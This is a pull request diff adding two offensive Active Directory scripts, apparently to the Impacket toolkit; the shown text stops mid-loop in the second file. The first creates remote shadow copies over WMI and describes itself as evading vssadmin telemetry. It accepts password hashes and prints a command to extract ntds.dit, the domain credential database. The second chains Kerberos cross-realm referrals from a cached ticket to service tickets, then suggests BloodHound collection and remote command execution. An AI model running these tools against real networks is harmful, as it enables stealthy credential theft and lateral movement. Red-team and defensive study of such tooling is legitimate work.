### PR TITLE
Integrate create-shadowcopy and skip-preauth-probe features

### DIFF
--- a/examples/create_shadowcopy.py
+++ b/examples/create_shadowcopy.py
@@ -1,0 +1,253 @@
+#!/usr/bin/env python
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright Fortra, LLC and its affiliated companies
+#
+# All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   Creates or deletes VSS (Volume Shadow Copy) snapshots on a remote
+#   machine via WMI DCOM. No vssadmin process is spawned on the target.
+#
+#   The shadow copy is created using Win32_ShadowCopy.Create() over DCOM,
+#   which avoids the process creation telemetry associated with vssadmin.
+#
+# Usage:
+#   create_shadowcopy.py [-volume C:\] [[domain/]username[:password]@]<target>
+#   create_shadowcopy.py -delete -shadow-id {GUID} [[domain/]username[:password]@]<target>
+#   create_shadowcopy.py -list [[domain/]username[:password]@]<target>
+#
+# Author:
+#   Black Lantern Security
+#
+
+import sys
+import logging
+import argparse
+
+from impacket.examples import logger
+from impacket.examples.utils import parse_target
+from impacket import version
+from impacket.dcerpc.v5.dcom import wmi
+from impacket.dcerpc.v5.dcom.oaut import NULL
+from impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSION
+from impacket.krb5.keytab import Keytab
+
+
+class ShadowCopy:
+    def __init__(self, host, username='', password='', domain='', hashes=None,
+                 aesKey=None, doKerberos=False, kdcHost=None):
+        self.__host = host
+        self.__username = username
+        self.__password = password
+        self.__domain = domain
+        self.__lmhash = ''
+        self.__nthash = ''
+        self.__aesKey = aesKey
+        self.__doKerberos = doKerberos
+        self.__kdcHost = kdcHost
+        if hashes is not None:
+            self.__lmhash, self.__nthash = hashes.split(':')
+
+    def __connect(self):
+        dcom = DCOMConnection(self.__host, self.__username, self.__password,
+                              self.__domain, self.__lmhash, self.__nthash,
+                              self.__aesKey, oxidResolver=False,
+                              doKerberos=self.__doKerberos,
+                              kdcHost=self.__kdcHost)
+        iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,
+                                             wmi.IID_IWbemLevel1Login)
+        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
+        iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
+        iWbemLevel1Login.RemRelease()
+        return dcom, iWbemServices
+
+    def create(self, volume):
+        dcom, iWbemServices = self.__connect()
+        try:
+            win32ShadowCopy, _ = iWbemServices.GetObject('Win32_ShadowCopy')
+            logging.info('Creating shadow copy for volume: %s' % volume)
+            result = win32ShadowCopy.Create(volume, 'ClientAccessible')
+            shadowId = result.ShadowID
+            logging.info('Shadow copy created: %s' % shadowId)
+
+            # Query for the device object path
+            query = "SELECT * FROM Win32_ShadowCopy WHERE ID='%s'" % shadowId
+            iEnum = iWbemServices.ExecQuery(query)
+            device_object = None
+            try:
+                item = iEnum.Next(0xffffffff, 1)[0]
+                props = item.getProperties()
+                device_object = props['DeviceObject']['value']
+            except Exception:
+                pass
+
+            return shadowId, device_object
+        finally:
+            dcom.disconnect()
+
+    def delete(self, shadowId):
+        dcom, iWbemServices = self.__connect()
+        try:
+            wmiPath = 'Win32_ShadowCopy.ID="%s"' % shadowId
+            logging.info('Deleting shadow copy: %s' % shadowId)
+            iWbemServices.DeleteInstance(wmiPath)
+            logging.info('Shadow copy deleted.')
+        finally:
+            dcom.disconnect()
+
+    def list(self):
+        dcom, iWbemServices = self.__connect()
+        try:
+            iEnum = iWbemServices.ExecQuery('SELECT * FROM Win32_ShadowCopy')
+            shadows = []
+            while True:
+                try:
+                    item = iEnum.Next(0xffffffff, 1)[0]
+                    props = item.getProperties()
+                    shadows.append({
+                        'ID': props['ID']['value'],
+                        'DeviceObject': props['DeviceObject']['value'],
+                        'VolumeName': props['VolumeName']['value'],
+                        'InstallDate': props['InstallDate']['value'],
+                    })
+                except Exception:
+                    break
+            return shadows
+        finally:
+            dcom.disconnect()
+
+
+if __name__ == '__main__':
+    print(version.BANNER)
+
+    parser = argparse.ArgumentParser(add_help=True,
+        description='Creates, lists, or deletes VSS shadow copies on a remote '
+                    'machine via WMI DCOM. No vssadmin process is spawned on '
+                    'the target.')
+
+    parser.add_argument('target', action='store',
+                        help='[[domain/]username[:password]@]<targetName or address>')
+    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
+    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
+    parser.add_argument('-com-version', action='store', metavar='MAJOR_VERSION:MINOR_VERSION',
+                        help='DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7')
+
+    action = parser.add_argument_group('action')
+    action.add_argument('-volume', action='store', default='C:\\',
+                        help='Volume to create the shadow copy for (default: C:\\)')
+    action.add_argument('-list', action='store_true', default=False,
+                        help='List existing shadow copies on the target')
+    action.add_argument('-delete', action='store_true', default=False,
+                        help='Delete a shadow copy (requires -shadow-id)')
+    action.add_argument('-shadow-id', action='store', metavar='ID',
+                        help='Shadow copy ID for deletion (e.g. {GUID})')
+
+    group = parser.add_argument_group('authentication')
+    group.add_argument('-hashes', action='store', metavar='LMHASH:NTHASH',
+                       help='NTLM hashes, format is LMHASH:NTHASH')
+    group.add_argument('-no-pass', action='store_true',
+                       help='Don\'t ask for password (useful for -k)')
+    group.add_argument('-k', action='store_true',
+                       help='Use Kerberos authentication. Grabs credentials from ccache file '
+                            '(KRB5CCNAME) based on target parameters. If valid credentials '
+                            'cannot be found, it will use the ones specified in the command line')
+    group.add_argument('-aesKey', action='store', metavar='hex key',
+                       help='AES key to use for Kerberos Authentication (128 or 256 bits)')
+    group.add_argument('-dc-ip', action='store', metavar='ip address',
+                       help='IP Address of the domain controller. If omitted it will use the '
+                            'domain part (FQDN) specified in the target parameter')
+    group.add_argument('-target-ip', action='store', metavar='ip address',
+                       help='IP Address of the target machine. If omitted it will use whatever '
+                            'was specified as target. This is useful when target is the NetBIOS '
+                            'name and you cannot resolve it')
+    group.add_argument('-keytab', action='store',
+                       help='Read keys for SPN from keytab file')
+
+    if len(sys.argv) == 1:
+        parser.print_help()
+        sys.exit(1)
+
+    options = parser.parse_args()
+
+    logger.init(options.ts, options.debug)
+
+    if options.debug is True:
+        logging.getLogger().setLevel(logging.DEBUG)
+    else:
+        logging.getLogger().setLevel(logging.INFO)
+
+    if options.com_version is not None:
+        try:
+            major_version, minor_version = options.com_version.split('.')
+            COMVERSION.set_default_version(int(major_version), int(minor_version))
+        except Exception:
+            logging.error('Wrong COMVERSION format, use dot separated integers e.g. "5.7"')
+            sys.exit(1)
+
+    if options.delete and not options.shadow_id:
+        logging.error('-delete requires -shadow-id')
+        sys.exit(1)
+
+    domain, username, password, address = parse_target(options.target)
+
+    if options.target_ip is None:
+        options.target_ip = address
+
+    if domain is None:
+        domain = ''
+
+    if password == '' and username != '' and options.hashes is None \
+            and options.no_pass is False and options.aesKey is None:
+        from getpass import getpass
+        password = getpass('Password:')
+
+    if options.aesKey is not None:
+        options.k = True
+
+    if options.keytab is not None:
+        Keytab.loadKeysFromKeytab(options.keytab, username, domain, options)
+        options.k = True
+
+    try:
+        sc = ShadowCopy(options.target_ip, username, password, domain,
+                        options.hashes, options.aesKey, options.k, options.dc_ip)
+
+        if options.list:
+            shadows = sc.list()
+            if not shadows:
+                logging.info('No shadow copies found.')
+            else:
+                print('')
+                for s in shadows:
+                    print('  Shadow ID:     %s' % s['ID'])
+                    print('  Device Object: %s' % s['DeviceObject'])
+                    print('  Volume Name:   %s' % s['VolumeName'])
+                    print('  Install Date:  %s' % s['InstallDate'])
+                    print('')
+
+        elif options.delete:
+            sc.delete(options.shadow_id)
+
+        else:
+            shadowId, deviceObject = sc.create(options.volume)
+            print('')
+            print('Shadow ID:     %s' % shadowId)
+            print('Device Object: %s' % deviceObject)
+            print('')
+            print('Use this device path with Read-RawNTFS to access files:')
+            print('  Read-RawNTFS -DevicePath "%s" -FileName "ntds.dit" -Output .\\ntds.dit' % deviceObject)
+            print('')
+            print('To delete this shadow copy:')
+            print('  create_shadowcopy.py -delete -shadow-id "%s" %s' % (shadowId, options.target))
+
+    except Exception as e:
+        if logging.getLogger().level == logging.DEBUG:
+            import traceback
+            traceback.print_exc()
+        logging.error(str(e))
+        sys.exit(1)

--- a/examples/cross_realm_tgs.py
+++ b/examples/cross_realm_tgs.py
@@ -1,0 +1,604 @@
+#!/usr/bin/env python3
+"""
+Cross-realm Kerberos ticket tool.
+
+Given a ccache with a TGT for realm A, automatically obtains a service ticket
+for a target in realm B by following the referral chain:
+
+  1. Present TGT to source KDC → get krbtgt/REALM_B referral TGT
+  2. Present referral TGT to target KDC → get service ticket (cifs/, ldap/, etc.)
+
+Handles multi-hop referrals automatically.
+
+Usage:
+    # Auto two-hop: source realm TGT → target in different realm
+    python3 cross_realm_tgs.py -ccache ./krb5cc_user -target server.child.domain.com \\
+        -dc-ip1 10.1.1.1 -dc-ip2 10.2.2.2
+
+    # Custom SPN (default is cifs,host)
+    python3 cross_realm_tgs.py -ccache ./krb5cc_user -target server.domain.com \\
+        -dc-ip1 10.1.1.1 -dc-ip2 10.2.2.2 -service ldap
+
+    # Single-hop (already have a cross-realm TGT)
+    python3 cross_realm_tgs.py -ccache ./referral.ccache -target server.domain.com \\
+        -dc-ip2 10.2.2.2
+"""
+
+import sys, os, argparse, datetime
+
+sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
+
+from impacket.krb5.ccache import CCache
+from impacket.krb5.asn1 import AP_REQ, TGS_REQ, TGS_REP, AS_REP, Authenticator, \
+    seq_set, seq_set_iter, KRB_ERROR, EncTGSRepPart
+from impacket.krb5.types import Principal, KerberosTime, Ticket
+from impacket.krb5 import constants
+from impacket.krb5.kerberosv5 import KerberosError
+from impacket.krb5.crypto import Key, _enctype_table
+from pyasn1.type.univ import noValue
+from pyasn1.codec.der import encoder, decoder
+import struct, socket, random, binascii, subprocess
+
+DEBUG = False
+
+
+def dbg(msg):
+    if DEBUG:
+        print(f'    [DBG] {msg}')
+
+
+def resolve_kdc(realm, kdc_map=None):
+    """Resolve KDC IP for a realm via DNS SRV, then A record fallback."""
+    if kdc_map and realm.upper() in kdc_map:
+        ip = kdc_map[realm.upper()]
+        dbg(f'KDC for {realm} from map: {ip}')
+        return ip
+
+    srv_name = f'_kerberos._tcp.{realm.lower()}'
+    try:
+        result = subprocess.run(
+            ['dig', '+short', 'SRV', srv_name],
+            capture_output=True, text=True, timeout=5
+        )
+        if result.returncode == 0 and result.stdout.strip():
+            for line in result.stdout.strip().split('\n'):
+                parts = line.split()
+                if len(parts) >= 4:
+                    host = parts[3].rstrip('.')
+                    try:
+                        ip = socket.getaddrinfo(host, 88, 0, socket.SOCK_STREAM)[0][4][0]
+                        dbg(f'KDC for {realm} via SRV: {host} -> {ip}')
+                        return ip
+                    except Exception:
+                        continue
+    except Exception as e:
+        dbg(f'SRV lookup failed for {realm}: {e}')
+
+    for name in [realm.lower(), realm]:
+        try:
+            ip = socket.getaddrinfo(name, 88, 0, socket.SOCK_STREAM)[0][4][0]
+            dbg(f'KDC for {realm} via A ({name}): {ip}')
+            return ip
+        except Exception:
+            pass
+
+    return None
+
+
+def send_raw(data, host, port=88):
+    messageLen = struct.pack('!i', len(data))
+    af, socktype, proto, _, sa = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)[0]
+    s = socket.socket(af, socktype, proto)
+    s.settimeout(10)
+    s.connect(sa)
+    s.sendall(messageLen + data)
+    recvDataLen = struct.unpack('!i', s.recv(4))[0]
+    r = s.recv(recvDataLen)
+    while len(r) < recvDataLen:
+        r += s.recv(recvDataLen - len(r))
+    s.close()
+    return r
+
+
+def decode_tgt(ticket_data):
+    try:
+        return decoder.decode(ticket_data, asn1Spec=TGS_REP())[0]
+    except:
+        return decoder.decode(ticket_data, asn1Spec=AS_REP())[0]
+
+
+def get_tgt_from_ccache(ccache):
+    """Find the best TGT in a ccache file."""
+    for c in ccache.credentials:
+        sname = '/'.join(c['server'].prettyPrint().split(b'@')[0].decode().split('/'))
+        if 'krbtgt' in sname.lower():
+            return c
+    return None
+
+
+def build_tgs_req(decoded_ticket, cipher, session_key, target_spn, target_realm, client_realm=None):
+    """Build a TGS-REQ using the given ticket."""
+    ticket = Ticket()
+    ticket.from_asn1(decoded_ticket['ticket'])
+
+    ticket_sname = '/'.join(str(s) for s in decoded_ticket['ticket']['sname']['name-string'])
+    ticket_realm_val = str(decoded_ticket['ticket']['realm'])
+    dbg(f'Building TGS-REQ:')
+    dbg(f'  Ticket sname: {ticket_sname}')
+    dbg(f'  Ticket realm: {ticket_realm_val}')
+    dbg(f'  Target SPN:   {target_spn}')
+    dbg(f'  Target realm (req-body): {target_realm}')
+    dbg(f'  Cipher:       etype={cipher.enctype} ({type(cipher).__name__})')
+    dbg(f'  Session key type: {session_key.enctype}')
+    dbg(f'  Session key:  {binascii.hexlify(session_key.contents[:8]).decode()}...')
+
+    # Use client_realm from the ticket if not overridden
+    if client_realm is None:
+        client_realm = str(decoded_ticket['crealm'])
+
+    dbg(f'  Authenticator crealm: {client_realm}')
+    clientName = Principal()
+    clientName.from_asn1(decoded_ticket, 'crealm', 'cname')
+    dbg(f'  Authenticator cname:  {clientName}')
+
+    apReq = AP_REQ()
+    apReq['pvno'] = 5
+    apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+    apReq['ap-options'] = constants.encodeFlags([])
+    seq_set(apReq, 'ticket', ticket.to_asn1)
+
+    authenticator = Authenticator()
+    authenticator['authenticator-vno'] = 5
+    authenticator['crealm'] = client_realm.encode('utf-8')
+
+    clientName = Principal()
+    clientName.from_asn1(decoded_ticket, 'crealm', 'cname')
+    seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+    now = datetime.datetime.now(datetime.timezone.utc)
+    authenticator['cusec'] = now.microsecond
+    authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+    encodedAuthenticator = encoder.encode(authenticator)
+    encryptedEncodedAuthenticator = cipher.encrypt(session_key, 7, encodedAuthenticator, None)
+
+    apReq['authenticator'] = noValue
+    apReq['authenticator']['etype'] = cipher.enctype
+    apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+    tgsReq = TGS_REQ()
+    tgsReq['pvno'] = 5
+    tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+    tgsReq['padata'] = noValue
+    tgsReq['padata'][0] = noValue
+    tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+    tgsReq['padata'][0]['padata-value'] = encoder.encode(apReq)
+
+    reqBody = seq_set(tgsReq, 'req-body')
+    reqBody['kdc-options'] = constants.encodeFlags([
+        constants.KDCOptions.canonicalize.value,
+        constants.KDCOptions.forwardable.value,
+        constants.KDCOptions.renewable.value,
+    ])
+
+    serverName = Principal(target_spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+    seq_set(reqBody, 'sname', serverName.components_to_asn1)
+    reqBody['realm'] = target_realm
+
+    till = now + datetime.timedelta(days=1)
+    reqBody['till'] = KerberosTime.to_asn1(till)
+    reqBody['nonce'] = random.getrandbits(31)
+    seq_set_iter(reqBody, 'etype', (
+        int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+        int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+        int(constants.EncryptionTypes.rc4_hmac.value),
+    ))
+
+    return encoder.encode(tgsReq)
+
+
+def send_tgs_req(message, kdc_ip):
+    """Send TGS-REQ and return either a TGS-REP or raise on error."""
+    dbg(f'Sending TGS-REQ to {kdc_ip}:88 ({len(message)} bytes)')
+    r = send_raw(message, kdc_ip)
+    dbg(f'Received response: {len(r)} bytes')
+
+    # Check for KRB_ERROR
+    try:
+        error_decoded = decoder.decode(r, asn1Spec=KRB_ERROR())[0]
+        krbError = KerberosError(packet=error_decoded)
+        dbg(f'KRB-ERROR received:')
+        dbg(f'  error-code: {error_decoded["error-code"]}')
+        dbg(f'  crealm:     {str(error_decoded["crealm"]) if error_decoded["crealm"].hasValue() else "(empty)"}')
+        dbg(f'  realm:      {str(error_decoded["realm"])}')
+        sname_parts = [str(s) for s in error_decoded['sname']['name-string']] if error_decoded['sname'].hasValue() else []
+        dbg(f'  sname:      {"/".join(sname_parts)}')
+        if error_decoded['e-text'].hasValue():
+            dbg(f'  e-text:     {str(error_decoded["e-text"])}')
+        if error_decoded['e-data'].hasValue():
+            dbg(f'  e-data:     {binascii.hexlify(bytes(error_decoded["e-data"])).decode()[:120]}...')
+        raise krbError
+    except KerberosError:
+        raise
+    except:
+        pass
+
+    tgs_rep = decoder.decode(r, asn1Spec=TGS_REP())[0]
+    dbg(f'TGS-REP received:')
+    dbg(f'  crealm: {str(tgs_rep["crealm"])}')
+    cname_parts = [str(s) for s in tgs_rep['cname']['name-string']]
+    dbg(f'  cname:  {"/".join(cname_parts)}')
+    ticket_sname = [str(s) for s in tgs_rep['ticket']['sname']['name-string']]
+    dbg(f'  ticket sname: {"/".join(ticket_sname)}')
+    dbg(f'  ticket realm: {str(tgs_rep["ticket"]["realm"])}')
+    dbg(f'  enc-part etype: {int(tgs_rep["enc-part"]["etype"])}')
+    return tgs_rep
+
+
+def decrypt_tgs_rep(tgs_rep, session_key):
+    """Decrypt TGS-REP enc-part and return new session key."""
+    cipherText = tgs_rep['enc-part']['cipher']
+    newCipher = _enctype_table[int(tgs_rep['enc-part']['etype'])]
+    dbg(f'Decrypting TGS-REP enc-part:')
+    dbg(f'  etype: {int(tgs_rep["enc-part"]["etype"])} ({type(newCipher).__name__})')
+    dbg(f'  using session key type: {session_key.enctype}')
+    dbg(f'  key usage: 8')
+    plainText = newCipher.decrypt(session_key, 8, cipherText)
+    encPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
+    new_key = Key(encPart['key']['keytype'], bytes(encPart['key']['keyvalue']))
+    dbg(f'  new session key type: {new_key.enctype}')
+    dbg(f'  new session key: {binascii.hexlify(new_key.contents[:8]).decode()}...')
+    if encPart['srealm'].hasValue():
+        dbg(f'  srealm in enc-part: {str(encPart["srealm"])}')
+    return new_key
+
+
+def save_ccache(tgs_raw, old_session_key, out_name):
+    """Save a TGS response to a ccache file."""
+    cc = CCache()
+    cc.fromTGS(tgs_raw, old_session_key, old_session_key)
+    cc.saveFile(out_name)
+
+
+def get_ticket_info(decoded):
+    """Extract readable info from a decoded Kerberos reply."""
+    crealm = str(decoded['crealm'])
+    cname = str(decoded['cname']['name-string'][0])
+    sname_parts = [str(s) for s in decoded['ticket']['sname']['name-string']]
+    srealm = str(decoded['ticket']['realm'])
+    return cname, crealm, '/'.join(sname_parts), srealm
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description='Cross-realm Kerberos ticket tool — auto referral chain',
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Examples:
+  # Two-hop: source realm TGT → service ticket in target realm
+  %(prog)s -ccache ./krb5cc_user -target server.child.domain.com -dc-ip1 10.1.1.1 -dc-ip2 10.2.2.2
+
+  # Single-hop: already have cross-realm TGT
+  %(prog)s -ccache ./referral.ccache -target server.domain.com -dc-ip2 10.2.2.2
+
+  # Custom service (ldap instead of cifs)
+  %(prog)s -ccache ./krb5cc_user -target dc01.domain.com -dc-ip1 10.1.1.1 -dc-ip2 10.2.2.2 -service ldap
+""")
+    parser.add_argument('-ccache', required=True, help='Source ccache file with TGT')
+    parser.add_argument('-target', required=True, help='Target hostname (e.g. server.domain.com)')
+    parser.add_argument('-service', default='cifs,host', help='Comma-separated service types (default: cifs,host). Use ldap for LDAP access.')
+    parser.add_argument('-dc-ip1', help='Source realm KDC IP (for getting referral TGT). Skip if ccache already has cross-realm TGT.')
+    parser.add_argument('-dc-ip2', required=True, help='Target realm KDC IP (for getting service ticket)')
+    parser.add_argument('-target-realm', help='Override target realm (auto-detected from referral if not set)')
+    parser.add_argument('-client-realm', help='Override client home realm for multi-hop referrals (e.g. PARENT.DOMAIN.COM)')
+    parser.add_argument('-kdc-map', help='Realm-to-IP map for intermediate KDCs (e.g. DOMAIN.COM:10.1.1.1,OTHER.COM:10.2.2.2)')
+    parser.add_argument('-debug', action='store_true')
+    args = parser.parse_args()
+
+    global DEBUG
+    DEBUG = args.debug
+
+    services = [s.strip() for s in args.service.split(',') if s.strip()]
+    spn = f'{services[0]}/{args.target}'
+
+    # Load ccache
+    ccache = CCache.loadFile(args.ccache)
+    dbg(f'Loaded ccache: {args.ccache}')
+    try:
+        dbg(f'  Default principal: {ccache.principal.prettyPrint().decode()}')
+        dbg(f'  Default realm: {ccache.principal.realm["data"].decode()}')
+    except Exception:
+        dbg(f'  (could not parse default principal)')
+    dbg(f'  Credentials in ccache: {len(ccache.credentials)}')
+    for i, c in enumerate(ccache.credentials):
+        c_client = c['client'].prettyPrint().decode() if hasattr(c['client'], 'prettyPrint') else str(c['client'])
+        c_server = c['server'].prettyPrint().decode() if hasattr(c['server'], 'prettyPrint') else str(c['server'])
+        dbg(f'    [{i}] client={c_client} server={c_server}')
+
+    cred = get_tgt_from_ccache(ccache)
+    if not cred:
+        print('[-] No krbtgt ticket found in ccache')
+        sys.exit(1)
+
+    tgt = cred.toTGT()
+    ticket_data = tgt['KDC_REP']
+    cipher = tgt['cipher']
+    session_key = tgt['sessionKey']
+    decoded = decode_tgt(ticket_data)
+    dbg(f'Decoded TGT from ccache:')
+    dbg(f'  cipher etype: {cipher.enctype} ({type(cipher).__name__})')
+    dbg(f'  session key etype: {session_key.enctype}')
+    dbg(f'  session key: {binascii.hexlify(session_key.contents[:8]).decode()}...')
+
+    cname, crealm, sname, srealm = get_ticket_info(decoded)
+    print(f'[*] Source ccache: {cname}@{crealm}')
+    print(f'[*] Current ticket: {sname}@{srealm}')
+    print(f'[*] Target: {spn}')
+
+    # Determine ticket type
+    ticket_sname_parts = [str(s) for s in decoded['ticket']['sname']['name-string']]
+    ticket_realm = str(decoded['ticket']['realm'])
+    is_same_realm_tgt = (len(ticket_sname_parts) == 2 and
+                         ticket_sname_parts[0].lower() == 'krbtgt' and
+                         ticket_sname_parts[1].upper() == crealm.upper())
+
+    # ── Determine target realm ─────────────────────────────────────────
+    if args.target_realm:
+        target_realm = args.target_realm.upper()
+    else:
+        parts = args.target.split('.', 1)
+        target_realm = parts[1].upper() if len(parts) > 1 else None
+
+    # Client's home realm — must stay constant through all referral hops
+    if args.client_realm:
+        client_home_realm = args.client_realm.upper()
+    else:
+        try:
+            client_home_realm = ccache.principal.realm['data'].decode()
+        except Exception:
+            client_home_realm = crealm
+    dbg(f'Client home realm: {client_home_realm}')
+    dbg(f'Target realm: {target_realm}')
+
+    # Parse KDC map for intermediate realms
+    kdc_map = {}
+    if args.kdc_map:
+        for entry in args.kdc_map.split(','):
+            if ':' in entry:
+                r, ip = entry.rsplit(':', 1)
+                kdc_map[r.strip().upper()] = ip.strip()
+        dbg(f'KDC map: {kdc_map}')
+
+    # Do we need to follow a referral chain?
+    needs_referral = is_same_realm_tgt or (
+        len(ticket_sname_parts) == 2 and
+        ticket_sname_parts[0].lower() == 'krbtgt' and
+        target_realm and
+        ticket_sname_parts[1].upper() != target_realm
+    )
+
+    if needs_referral and is_same_realm_tgt and not args.dc_ip1:
+        print(f'[-] TGT is for same realm ({crealm}) — need -dc-ip1 to get cross-realm referral')
+        sys.exit(1)
+
+    # ── Referral loop: follow chain until we reach target realm ────────
+    if needs_referral:
+        current_decoded = decoded
+        current_cipher = cipher
+        current_session_key = session_key
+
+        if is_same_realm_tgt:
+            current_kdc = args.dc_ip1
+        else:
+            inter_realm = ticket_sname_parts[1].upper()
+            current_kdc = args.dc_ip1 or resolve_kdc(inter_realm, kdc_map)
+            if not current_kdc:
+                print(f'[-] Cannot resolve KDC for {inter_realm}. Use -dc-ip1 or -kdc-map.')
+                sys.exit(1)
+
+        seen_realms = set()
+        max_hops = 10
+
+        for hop in range(1, max_hops + 1):
+            hop_sname = [str(s) for s in current_decoded['ticket']['sname']['name-string']]
+            if hop_sname[0].lower() == 'krbtgt' and len(hop_sname) > 1:
+                kdc_realm = hop_sname[1].upper()
+            else:
+                kdc_realm = str(current_decoded['ticket']['realm']).upper()
+
+            if kdc_realm in seen_realms:
+                print(f'[-] Referral loop detected (already visited {kdc_realm})')
+                sys.exit(1)
+            seen_realms.add(kdc_realm)
+
+            print(f'\n[*] Hop {hop}: requesting {spn} from {kdc_realm} KDC ({current_kdc})')
+
+            message = build_tgs_req(current_decoded, current_cipher, current_session_key,
+                                    spn, kdc_realm, client_realm=client_home_realm)
+
+            tgs_rep = None
+            try:
+                tgs_rep = send_tgs_req(message, current_kdc)
+            except KerberosError as e:
+                err_code = e.getErrorCode()
+
+                if err_code == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value:
+                    pkt = e.getErrorPacket()
+                    hint = None
+                    if pkt and pkt['crealm'].hasValue():
+                        hint = str(pkt['crealm']).upper()
+                    if hint:
+                        print(f'[*] KDC redirected to realm: {hint}')
+                        message = build_tgs_req(current_decoded, current_cipher, current_session_key,
+                                                f'krbtgt/{hint}', hint, client_realm=client_home_realm)
+                        try:
+                            tgs_rep = send_tgs_req(message, current_kdc)
+                        except KerberosError as e2:
+                            print(f'[-] Explicit krbtgt/{hint} failed: {e2}')
+                            sys.exit(1)
+                    elif target_realm:
+                        print(f'[*] No realm hint, trying krbtgt/{target_realm}...')
+                        message = build_tgs_req(current_decoded, current_cipher, current_session_key,
+                                                f'krbtgt/{target_realm}', target_realm,
+                                                client_realm=client_home_realm)
+                        try:
+                            tgs_rep = send_tgs_req(message, current_kdc)
+                        except KerberosError as e2:
+                            print(f'[-] Failed: {e2}')
+                            sys.exit(1)
+                    else:
+                        print(f'[-] KDC_ERR_WRONG_REALM but no realm hint. Use -target-realm.')
+                        sys.exit(1)
+
+                elif err_code == constants.ErrorCodes.KDC_ERR_S_PRINCIPAL_UNKNOWN.value and target_realm:
+                    print(f'[*] SPN not found in {kdc_realm}, trying krbtgt/{target_realm}...')
+                    message = build_tgs_req(current_decoded, current_cipher, current_session_key,
+                                            f'krbtgt/{target_realm}', target_realm,
+                                            client_realm=client_home_realm)
+                    try:
+                        tgs_rep = send_tgs_req(message, current_kdc)
+                    except KerberosError as e2:
+                        print(f'[-] Failed: {e2}')
+                        sys.exit(1)
+                else:
+                    print(f'[-] KDC error at hop {hop}: {e}')
+                    sys.exit(1)
+
+            ref_cname, ref_crealm, ref_sname, ref_srealm = get_ticket_info(tgs_rep)
+            print(f'[+] Got: {ref_sname}@{ref_srealm}')
+
+            new_session_key = decrypt_tgs_rep(tgs_rep, current_session_key)
+
+            ref_raw = encoder.encode(tgs_rep)
+            if ref_sname.lower().startswith('krbtgt/'):
+                ref_target = ref_sname.split('/')[1]
+                ref_filename = f'krb_referral_{ref_target.lower().replace(".", "_")}.ccache'
+            else:
+                ref_filename = f'krb_{services[0]}_{args.target.split(".")[0].lower()}.ccache'
+            save_ccache(ref_raw, current_session_key, ref_filename)
+            print(f'[+] Saved: {ref_filename}')
+
+            if not ref_sname.lower().startswith('krbtgt/'):
+                print(f'\n[+] Service ticket obtained after {hop} hop(s)!')
+                # Request remaining service types using the cross-realm TGT from the previous hop
+                out_ccache = CCache()
+                out_ccache.fromTGS(ref_raw, current_session_key, current_session_key)
+                remaining = [s for s in services if s.lower() != ref_sname.split('/')[0].lower()]
+                for svc_type in remaining:
+                    svc_spn = f'{svc_type}/{args.target}'
+                    print(f'[*] Requesting {svc_spn} from {ref_srealm} KDC ({current_kdc})')
+                    msg = build_tgs_req(current_decoded, current_cipher, current_session_key,
+                                        svc_spn, ref_srealm, client_realm=client_home_realm)
+                    try:
+                        extra_rep = send_tgs_req(msg, current_kdc)
+                        extra_cname, extra_crealm, extra_sname, extra_srealm = get_ticket_info(extra_rep)
+                        print(f'[+] Got: {extra_sname}@{extra_srealm}')
+                        extra_raw = encoder.encode(extra_rep)
+                        tmp_cc = CCache()
+                        tmp_cc.fromTGS(extra_raw, current_session_key, current_session_key)
+                        out_ccache.credentials.extend(tmp_cc.credentials)
+                    except KerberosError as e:
+                        print(f'[-] Failed to get {svc_spn}: {e}')
+
+                svc_filename = f'krb_{args.target.split(".")[0].lower()}.ccache'
+                out_ccache.saveFile(svc_filename)
+                print(f'\n[+] Saved {len(out_ccache.credentials)} ticket(s) to {svc_filename}')
+                print(f'[*] Use:')
+                print(f'    export KRB5CCNAME=./{svc_filename}')
+                if 'ldap' in services:
+                    print(f'    bloodhound-python -c All -k -no-pass -d {target_realm.lower()} -dc {args.target}')
+                else:
+                    print(f'    smbclient.py -k -no-pass {args.target}')
+                    print(f'    atexec.py -k -no-pass {args.target} <command>')
+                return
+
+            ref_realm = ref_sname.split('/')[1].upper()
+
+            if target_realm and ref_realm == target_realm:
+                decoded = tgs_rep
+                cipher = _enctype_table[int(new_session_key.enctype)]
+                session_key = new_session_key
+                print(f'[*] Reached target realm {target_realm} after {hop} hop(s)')
+                break
+
+            # Intermediate referral — resolve next KDC
+            print(f'[*] Intermediate referral to {ref_realm}')
+            if ref_realm.upper() in kdc_map:
+                next_kdc = kdc_map[ref_realm.upper()]
+            elif args.dc_ip2 and target_realm and ref_realm == target_realm:
+                next_kdc = args.dc_ip2
+            else:
+                next_kdc = resolve_kdc(ref_realm, kdc_map)
+            if not next_kdc:
+                print(f'[-] Cannot resolve KDC for {ref_realm}')
+                print(f'    Use: -kdc-map {ref_realm}:<ip>')
+                sys.exit(1)
+            print(f'[*] Resolved {ref_realm} KDC: {next_kdc}')
+
+            current_decoded = tgs_rep
+            current_cipher = _enctype_table[int(new_session_key.enctype)]
+            current_session_key = new_session_key
+            current_kdc = next_kdc
+        else:
